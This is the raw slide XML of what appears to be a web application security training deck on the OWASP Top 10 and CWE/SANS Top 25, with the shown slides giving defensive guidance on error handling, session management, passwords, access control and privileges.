            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="365760" indent="-256032" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef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Provide short error messages to the user while logging detailed error information to an internal log file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="68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Diagnostic information is available to site maintainers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="68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Vague messages indicating an internal failure provided to the users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-256032" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef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Provide just enough information to allow what is reported by the user to be able to linked the internal error logs.  For ex: System Time-stamp, client IP address, and URL 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214422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A6. Improper Error Handling - Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty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35AB45-C06A-4B25-9982-59D103F53C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80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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694382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Ensure sensitive responses with multiple outcomes return identical results.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Save the different responses and diff the html, the http headers &amp; URL.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Ensure error messages are returned in roughly the same time or consider imposing a random wait time for all transactions to hide this detail from the attacker.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92867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A6. Information Leakage - Protections</a:t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E4E25D-76BD-4929-AACC-E4ED4918CBC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81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1142984"/>
            <a:ext cx="9013825" cy="5265754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Error messages displayed can reveal information related to server configuration, method calls, database information etc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These can be used by attacker to gain knowledge about your application’s configuration and help him prepare his attack vectors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CWE-209: Error Message Information Leak</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty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8C4761-7D10-4F2F-8429-1EEB662A59C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n-US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5" descr="Figure 5 SqlException"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:lum bright="-6000" contrast="6000"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="71406" y="714356"/>
            <a:ext cx="9039831" cy="569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0" y="3962400"/>
            <a:ext cx="9013825" cy="2057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0" y="163605"/>
            <a:ext cx="9144000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CWE-209: Error Message Information Leak - Example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</a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43012" name="TextBox 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="6629400"/>
            <a:ext cx="5867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F6600"/>
                </a:solidFill>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>www.aspectsecurity.com/documents/Aspect_OWASP_Top_10_Part_1.ppt - Similar pages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4301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50C321-87FF-40EC-B829-B200C167DF2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en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43014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265754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Ensure error messages have minimal information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a standard custom format for all error messages generated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Handle exceptions internally and do not display any errors related to code execution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600" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CWE-209: Error Message Information Leak - Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty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E97726-53FB-4CE5-A479-38F0A82CEF1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2983"/>
            <a:ext cx="9144000" cy="5630879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b="1" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>OWASP Definition:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="260350" indent="-9525" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="324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Account credentials and session tokens are often not 	properly protected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="260350" indent="-9525" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="324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 Attackers compromise passwords, keys, or 	authentication tokens to assume other users’ 	identities.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A7.	Broken Authentication &amp; Session Management</a:t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6998E1-102D-4AD0-8A29-8778F5F5F1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lang="en-US"/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94316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HTTP/S protocol does not provide tracking of a users session.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Session tracking answers the question:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="15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After a user authenticates how does the server associate subsequent requests to the authenticated user?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Typically, web application vendors provide a built-in session tracking, which is good if used properly.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Often developers will make the mistake of inventing their own session tracking.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A7. Session Management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D4A30A-758F-45E2-B583-3E5B22C31DD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en-US"/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337192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Session ID is disclosed or is guessed.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An attacker using the same session ID has the same privileges as the real user.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Especially useful to an attacker if the session is privileged.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Allows initial access to the web application to be combined with other attacks.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A7. Session Management ( Session Hijacking)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty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4F546E-4A91-4D28-8661-57AEA9F3165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87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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94316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long complex random session ID that cannot be guessed.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Protect the transmission and storage of the Session ID to prevent disclosure and hijacking.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 URL query string should not be used for Session ID or any User/Session information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="20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URL is stored in browser cache .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buSzPct val="68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Logged via Web proxies and stored in the proxy cache.</a:t>
            </a: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A7. Session Management - Protection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C8FC26-8341-41BB-8CCD-A5EA147013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88</a:t>
            </a:fld>
            <a:endParaRPr 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265754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Entire session should be transmitted via HTTPS to prevent disclosure of the session ID  (not just the authentication).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Avoid or protect any session information transmitted to/from the client.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Session ID should expire and/or time-out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>on the Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>when idle or on logout.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Client side cookie expirations useful, but should not be trusted.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Consider regenerating a new session upon successful authentication or privilege level change.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A7. Session Management - Protection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00D62B-584C-4C93-9FBF-2A1E214FDA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89</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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What is Web Application Security ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-256032" fontAlgn="auto"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Why is it important ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-256032" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="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OWASP Top 10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Description of the vulnerability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Example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Solution ( Best Practice to avoid the vulnerability)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="-256032" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="4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Top 25 Programming Errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="603504" lvl="2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Description of the error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="603504" lvl="2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Example </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="603504" lvl="2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Solution ( Best Practice to avoid the error) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="2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Hands - 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3C9D07-E8B2-438A-95EC-608206DF0D6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265754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Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Even valid authentication schemes can be undermined by 	flawed account management functions including:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1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Account update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1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Forgotten password recovery or reset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1" fontAlgn="auto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Font typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Change password, and other similar functions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A7. Broken Account Management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553D7E-E2FA-4400-808C-2E5A0323A48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90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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337192"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="365760" indent="-256032" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="30000"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Password Change Controls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> - require users to provide both old and new passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-256032" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="30000"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Forgotten Password Controls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> - if forgotten passwords are emailed to users, they should be required to re-authenticate whenever they attempt to change their email address. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-256032" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="30000"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Password Strength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> - require at least 7 characters, with letters, numbers, and special characters both upper case and lower case. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-256032" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="30000"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Password Expiration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>- Users must change passwords every 90 days, and administrators every 30 days.</a:t>
            </a:r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A7. Broken Account and Session Management -  Protection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DE3F11-3E2C-4F8B-A260-29E8856D209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91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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>
          <a:xfrm>
            <a:off x="0" y="1481138"/>
            <a:ext cx="9144000" cy="473394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SzPct val="100000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Password Storage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> - never store passwords in plain text. Passwords should always be stored in either hashed (preferred) or encrypted form.</a:t>
            </a:r>
          </a:p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SzPct val="100000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Protecting Credentials in Transit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> - to prevent "man-in-the-middle" attacks the entire authenticated session / transaction should be encrypted SSLv3 or TLSv1.</a:t>
            </a:r>
          </a:p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SzPct val="100000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Man-in-the-middle attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> - are still possible with SSL if users disable or ignore warnings about invalid SSL certificates.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811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A7. Broken Account and Session Management -  Protection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71DA29-C994-4208-A316-A9A4BDC8F43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92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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OWASP Top 10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Content Placeholder 1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357850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Authorized users may escalate their access controls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Users may gain access to restricted parts of the application using their legitimate access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Users can misuse their excessive privileges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142876"/>
            <a:ext cx="9013825" cy="92867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CWE-285: Improper Access Control (Authorization)</a:t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29A22F-A798-4DFC-9CD2-C5EF3E63F82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93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="727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94316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Assign access controls according to business logic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Access control should be placed on server side for every page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Divide application into anonymous, normal, privileged and admin areas. Reduce attacks by carefully mapping roles to areas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"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CWE-285: Improper Access Control (Authorization) - Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty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D0AC19-CAF6-47C8-BE29-B80216C2E38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94</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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265754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Hard-coding a secret account or password into your software’s authentication module is extremely easy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If password is same across all your software, then every customer becomes vulnerable, since your password is hardcoded it’s usually hard to fix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CWE-259: Hard-Coded Password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty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8AA28-9885-4734-85B8-A27F39D9C30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95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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94316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For outbound authentication: store passwords outside of the code in a strongly-protected, encrypted file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For inbound authentication: Rather than hard-code a default username and password, utilize a “first login” that allows user to enter a strong password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings 3" pitchFamily="18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CWE-259: Hard-Coded Password - Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty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59A380-CC87-48FD-98A3-CE01C0D1A76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96</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="58769" y="928670"/>
            <a:ext cx="9013825" cy="5078430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Your software may need special privileges to perform certain operations, but wielding those privileges longer than necessary can be extremely risky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With those special privileges, the application has access to resources that application’s user can’t directly reach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Command injection could be result</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"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69" y="214314"/>
            <a:ext cx="9013825" cy="92867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 CWE-250: Execution with Unnecessary Privileges</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean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00D9D34-0D36-457A-B002-F8FCDA0B4B9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97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="809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CWE/SANS Top 25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Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1306518"/>
            <a:ext cx="9144000" cy="5194316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Identify the functionality that requires additional privileges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 Wrap and centralize this functionality and isolate privileged code as much as possible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Ensure you drop privileges as soon as possible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Perform input validation for any privileged code that must be exposed to the user and reject anything that does not fit your requirements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CWE-250: Execution with Unnecessary Privileges - Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty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5C07BB-A6A2-44C3-8AEC-B170FB55F5E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98</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="819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072098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Data is stored in areas other than database like configuration files, cookies, hidden form fields, registry keys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If this is critical data  then it is under threat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In stateless protocols such as HTTP, some form of user state information must be captured in each request, so it is exposed to attacker out of necessity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CWE-642: External Control of Critical State Data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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22DFA5-EF01-48F2-9038-351940D0CC2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99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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1192</TotalTime>
  <Words>6001</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>1013</Paragraphs>
  <Slides>120</Slides>
  <Notes>120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1" baseType="lpstr">
      <vt:lpstr>Concourse</vt:lpstr>
      <vt:lpstr>Web Application Security Threats and Best Practices </vt:lpstr>
      <vt:lpstr>What to Expect?</vt:lpstr>
      <vt:lpstr>What to Expect?</vt:lpstr>
      <vt:lpstr>Slide 4</vt:lpstr>
      <vt:lpstr>What is Web Application Security?</vt:lpstr>
      <vt:lpstr>Slide 6</vt:lpstr>
      <vt:lpstr>Slide 7</vt:lpstr>
      <vt:lpstr>Why is it Important?</vt:lpstr>
      <vt:lpstr>Slide 9</vt:lpstr>
      <vt:lpstr>OWASP Top 10</vt:lpstr>
      <vt:lpstr>OWASP Top 10 List</vt:lpstr>
      <vt:lpstr>OWASP Top 10 List</vt:lpstr>
      <vt:lpstr>What Are Top 25 Programming Errors?</vt:lpstr>
      <vt:lpstr>Why Do We Need Top 25? </vt:lpstr>
      <vt:lpstr>How Are Top 25 Categorized?</vt:lpstr>
      <vt:lpstr>Insecure Interaction Between Components </vt:lpstr>
      <vt:lpstr>Insecure Interaction Between Components </vt:lpstr>
      <vt:lpstr>Category: Risky Resource Management </vt:lpstr>
      <vt:lpstr>Category: Risky Resource Management </vt:lpstr>
      <vt:lpstr>Porous Defenses</vt:lpstr>
      <vt:lpstr>A1. Cross-Site Scripting (XSS) </vt:lpstr>
      <vt:lpstr>A1. Cross-Site Scripting (XSS) </vt:lpstr>
      <vt:lpstr>A1. Cross-Site Scripting (XSS) </vt:lpstr>
      <vt:lpstr>XSS-Attack: General Overview</vt:lpstr>
      <vt:lpstr>XSS - Protection</vt:lpstr>
      <vt:lpstr>CWE-116: Improper Encoding or Escaping of Output </vt:lpstr>
      <vt:lpstr>C# ASP.NET Examples</vt:lpstr>
      <vt:lpstr>CWE-116: Improper Encoding or Escaping of Output – Protection</vt:lpstr>
      <vt:lpstr>C# ASP.NET Examples</vt:lpstr>
      <vt:lpstr>CWE-79: Failure to Preserve Web Page Structure (aka 'Cross-site Scripting') </vt:lpstr>
      <vt:lpstr>Stored Cross-Site Scripting Illustrated</vt:lpstr>
      <vt:lpstr>CWE-79: Failure to Preserve Web Page Structure (aka 'Cross-site Scripting') - Protection</vt:lpstr>
      <vt:lpstr>CWE-94: Failure to Control Generation of Code (aka 'Code Injection')</vt:lpstr>
      <vt:lpstr>C# ASP.Net Examples</vt:lpstr>
      <vt:lpstr>CWE-94: Failure to Control Generation of Code (aka 'Code Injection') - Protection</vt:lpstr>
      <vt:lpstr>CWE-602: Client-Side Enforcement of Server-Side Security</vt:lpstr>
      <vt:lpstr>CWE-602: Client-Side Enforcement of Server-Side Security - Protection</vt:lpstr>
      <vt:lpstr>A2. Injection Flaws </vt:lpstr>
      <vt:lpstr>A2. Injection Flaws </vt:lpstr>
      <vt:lpstr>C#ASP.Net Examples</vt:lpstr>
      <vt:lpstr>C#ASP.Net Examples</vt:lpstr>
      <vt:lpstr>Examples</vt:lpstr>
      <vt:lpstr>A2. Injection Flaws ( SQL Injection) </vt:lpstr>
      <vt:lpstr>SQL Injection - Prevention</vt:lpstr>
      <vt:lpstr>SQL Injection - Prevention</vt:lpstr>
      <vt:lpstr>CWE-20: Improper Input Validation </vt:lpstr>
      <vt:lpstr>Unvalidated Input Illustrated</vt:lpstr>
      <vt:lpstr>C#ASP.Net Examples</vt:lpstr>
      <vt:lpstr>C#ASP.Net Examples</vt:lpstr>
      <vt:lpstr>CWE-20: Improper Input Validation - Protection</vt:lpstr>
      <vt:lpstr>C# ASP.Net Examples</vt:lpstr>
      <vt:lpstr>CWE-89: Failure to Preserve SQL Query Structure (aka 'SQL Injection') </vt:lpstr>
      <vt:lpstr>SQL Injection – Illustrated</vt:lpstr>
      <vt:lpstr>CWE-89: Failure to Preserve SQL Query Structure (aka 'SQL Injection’) - Protection </vt:lpstr>
      <vt:lpstr>A3. Malicious File Execution</vt:lpstr>
      <vt:lpstr> A3. Malicious File Execution </vt:lpstr>
      <vt:lpstr>C# ASP.Net Example</vt:lpstr>
      <vt:lpstr>A3. Malicious File Execution - Protection</vt:lpstr>
      <vt:lpstr>C# ASP.Net Example</vt:lpstr>
      <vt:lpstr>CWE-78: Failure to Preserve OS Command Structure (aka 'OS Command Injection')  </vt:lpstr>
      <vt:lpstr>Examples</vt:lpstr>
      <vt:lpstr>CWE-78: Failure to Preserve OS Command Structure (aka 'OS Command Injection') - Protection</vt:lpstr>
      <vt:lpstr>CWE-73: External Control of File Name or Path</vt:lpstr>
      <vt:lpstr>C# ASP.Net Example</vt:lpstr>
      <vt:lpstr>CWE-73: External Control of File Name or Path - Protection</vt:lpstr>
      <vt:lpstr>C# ASP.Net Example</vt:lpstr>
      <vt:lpstr>A4. Insecure Direct Object Reference</vt:lpstr>
      <vt:lpstr>A4. Insecure Direct Object Reference</vt:lpstr>
      <vt:lpstr>C# ASP.NET Example</vt:lpstr>
      <vt:lpstr>A4. Insecure Direct Object Reference - Protection</vt:lpstr>
      <vt:lpstr>A5. Cross Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>A5. Cross Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Slide 73</vt:lpstr>
      <vt:lpstr>A5. CSRF - Protection</vt:lpstr>
      <vt:lpstr>CWE-352: Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>CWE-352: Cross-Site Request Forgery (CSRF) - Protection </vt:lpstr>
      <vt:lpstr>A6. Information Leakage &amp; Improper Error Handling </vt:lpstr>
      <vt:lpstr>A6. Information Leakage &amp; Improper Error Handling - Example</vt:lpstr>
      <vt:lpstr>A6. Improper Error Handling - Protection</vt:lpstr>
      <vt:lpstr>A6. Improper Error Handling - Protection</vt:lpstr>
      <vt:lpstr>A6. Information Leakage - Protections </vt:lpstr>
      <vt:lpstr>CWE-209: Error Message Information Leak</vt:lpstr>
      <vt:lpstr>Slide 83</vt:lpstr>
      <vt:lpstr>CWE-209: Error Message Information Leak - Protection</vt:lpstr>
      <vt:lpstr>A7. Broken Authentication &amp; Session Management </vt:lpstr>
      <vt:lpstr>A7. Session Management</vt:lpstr>
      <vt:lpstr>A7. Session Management ( Session Hijacking)</vt:lpstr>
      <vt:lpstr>A7. Session Management - Protection</vt:lpstr>
      <vt:lpstr>A7. Session Management - Protection</vt:lpstr>
      <vt:lpstr>A7. Broken Account Management</vt:lpstr>
      <vt:lpstr>A7. Broken Account and Session Management -  Protection</vt:lpstr>
      <vt:lpstr>A7. Broken Account and Session Management -  Protection</vt:lpstr>
      <vt:lpstr>CWE-285: Improper Access Control (Authorization) </vt:lpstr>
      <vt:lpstr>CWE-285: Improper Access Control (Authorization) - Protection</vt:lpstr>
      <vt:lpstr>CWE-259: Hard-Coded Password</vt:lpstr>
      <vt:lpstr>CWE-259: Hard-Coded Password - Protection</vt:lpstr>
      <vt:lpstr> CWE-250: Execution with Unnecessary Privileges </vt:lpstr>
      <vt:lpstr>CWE-250: Execution with Unnecessary Privileges - Protection</vt:lpstr>
      <vt:lpstr>CWE-642: External Control of Critical State Data</vt:lpstr>
      <vt:lpstr>CWE-642: External Control of Critical State Data - Protection</vt:lpstr>
      <vt:lpstr>CWE-330: Use of Insufficiently Random Values</vt:lpstr>
      <vt:lpstr>CWE-330: Use of Insufficiently Random Values - Protection</vt:lpstr>
      <vt:lpstr>A8. Insecure Cryptographic Storage</vt:lpstr>
      <vt:lpstr>A8. Insecure Cryptographic Storage</vt:lpstr>
      <vt:lpstr>Slide 105</vt:lpstr>
      <vt:lpstr>A8. Insecure Cryptographic Storage -  Protection </vt:lpstr>
      <vt:lpstr>CWE-327: Use of a Broken or Risky Cryptographic Algorithm</vt:lpstr>
      <vt:lpstr>CWE-327: Use of a Broken or Risky Cryptographic Algorithm - Protection</vt:lpstr>
      <vt:lpstr>A9. Insecure Communications</vt:lpstr>
      <vt:lpstr>A9. Insecure Communications</vt:lpstr>
      <vt:lpstr>A9. Insecure Communications - Protection</vt:lpstr>
      <vt:lpstr>CWE-319: Cleartext Transmission of Sensitive Information  </vt:lpstr>
      <vt:lpstr>CWE-319: Cleartext Transmission of Sensitive Information - Protection</vt:lpstr>
      <vt:lpstr>A10. Failure to Restrict URL Access</vt:lpstr>
      <vt:lpstr>A10. Failure to Restrict URL Access</vt:lpstr>
      <vt:lpstr>A10. Failure to Restrict URL Access -  Protection</vt:lpstr>
      <vt:lpstr>CWE-732: Insecure Permission Assignment for Critical Resource</vt:lpstr>
      <vt:lpstr>CWE-732: Insecure Permission Assignment for Critical Resource - Protection</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
